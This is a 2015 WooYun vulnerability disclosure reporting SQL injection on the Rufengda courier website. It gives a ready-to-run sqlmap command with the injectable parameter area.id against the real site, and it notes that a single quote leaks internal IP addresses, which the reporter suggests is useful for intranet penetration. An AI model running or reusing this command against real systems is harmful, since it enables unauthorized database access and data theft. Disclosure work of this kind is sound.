当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0137501
漏洞标题:
如风达主站存在SQL注入漏洞
相关厂商:
如风达
漏洞作者:
lightless
提交时间:
2015-08-28 18:58
修复时间:
2015-10-12 19:00
公开时间:
2015-10-12 19:00
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
20
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-08-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

快递送的确实挺快的。。。

详细说明:

主站SQL注入一枚:

python sqlmap.py -u "http://www.rufengda.com/front/queryServiceLocation.do" --data "areaName=%E5%8C%97%E4%BA%AC-%E5%8C%97%E4%BA%AC%E5%B8%82-%E8%A5%BF%E5%9F%8E%E5%8C%BA&area.id=110100&address" -p area.id --random-agent --tamper=space2comment


数据挺多,不过我看不懂,重要与否你们自评吧。
PS:还有个内网信息泄露,area.id参数直接加个单引号就出来了。

5.png


把内网IP爆出来了,后面如果内网渗透的话应该有用吧。(其实然并卵

漏洞证明:

1.png


2.png


3.png


4.png


不深入了,到此为止,一个表就几千条数据,更别说这么多库这么多表了。
谢绝跨省。

修复方案:

过滤啊。。

版权声明:转载请注明来源 lightless@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝